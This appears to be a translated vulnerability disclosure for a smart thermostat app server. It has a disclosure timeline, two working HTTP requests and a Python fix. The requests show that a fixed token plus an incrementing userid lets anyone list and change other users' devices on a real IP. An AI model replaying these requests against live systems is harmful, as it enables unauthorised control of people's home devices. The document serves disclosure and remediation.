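2015-08-02: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public.
2015-09-16: The vendor has actively ignored the vulnerability; details are disclosed to the public.
Hmm, this one can be heated up too.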
    POST /networker/AppServer/device.php HTTP/1.1
    Content-Length: 58
    Content-Type: application/x-www-form-urlencoded
    Host: 218.244.138.2
    Connection: close
    Accept-Encoding: gzip

    action=list&userid=61&token=Y29tLmVsc29uaWMuTlRlbXB1cmU%3D
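The token is fixed, so you only need to iterate over userid to enumerate every user's devices.
Once you have a device id, you can modify the device directly.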
    POST /networker/AppServer/device.php HTTP/1.1
    Content-Length: 93
    Content-Type: application/x-www-form-urlencoded
    Host: 218.244.138.2
    Connection: Keep-Alive
    Accept-Encoding: gzip

    action=switchmanual&userid=47&token=Y29tLmVsc29uaWMuTlRlbXB1cmU%3D&deviceid=1306&tempure=32.0
Filter.
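One way to close both requests shown above, as an added sketch that is not the vendor's code: the token is derived per user and checked against userid, and a device can only be changed by the userid that owns it. The secret, the ownership table and the function names are assumptions; the static token is the value from the report, URL-decoded.

```python
import hashlib
import hmac

# Constructed sample data (assumptions, not values from the vendor's system).
SERVER_SECRET = b"constructed-demo-secret"
DEVICE_OWNER = {1306: 47, 2001: 61}  # deviceid -> userid that owns it
STATIC_TOKEN = "Y29tLmVsc29uaWMuTlRlbXB1cmU="  # shared token seen in the report


def issue_token(userid: int) -> str:
    """Token handed out at login: bound to one userid, not shared by all clients."""
    return hmac.new(SERVER_SECRET, str(userid).encode(), hashlib.sha256).hexdigest()


def authenticate(params: dict) -> int:
    """Return the userid only if the supplied token was issued for it."""
    try:
        userid = int(params["userid"])
    except (KeyError, ValueError):
        raise PermissionError("missing or malformed userid")
    supplied = str(params.get("token", "")).encode()
    if not hmac.compare_digest(issue_token(userid).encode(), supplied):
        raise PermissionError("token was not issued for this userid")
    return userid


def handle(params: dict) -> dict:
    """device.php-style dispatcher for the two actions shown in the report."""
    userid = authenticate(params)
    action = params.get("action")
    if action == "list":
        # Only the caller's own devices are ever returned.
        return {"devices": sorted(d for d, o in DEVICE_OWNER.items() if o == userid)}
    if action == "switchmanual":
        try:
            deviceid = int(params["deviceid"])
            tempure = float(params["tempure"])
        except (KeyError, ValueError):
            raise ValueError("missing or malformed deviceid/tempure")
        # Object-level check: a valid login is not enough to touch any deviceid.
        if DEVICE_OWNER.get(deviceid) != userid:
            raise PermissionError("device does not belong to this userid")
        return {"deviceid": deviceid, "tempure": tempure}
    raise ValueError("unknown action")
```

The HMAC over userid stands in for a session token here; a deployed service would issue random, expiring tokens per login and keep the same two checks.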
Unable to contact the vendor, or the vendor actively refused.
Vulnerability Rank: 15 (WooYun rating)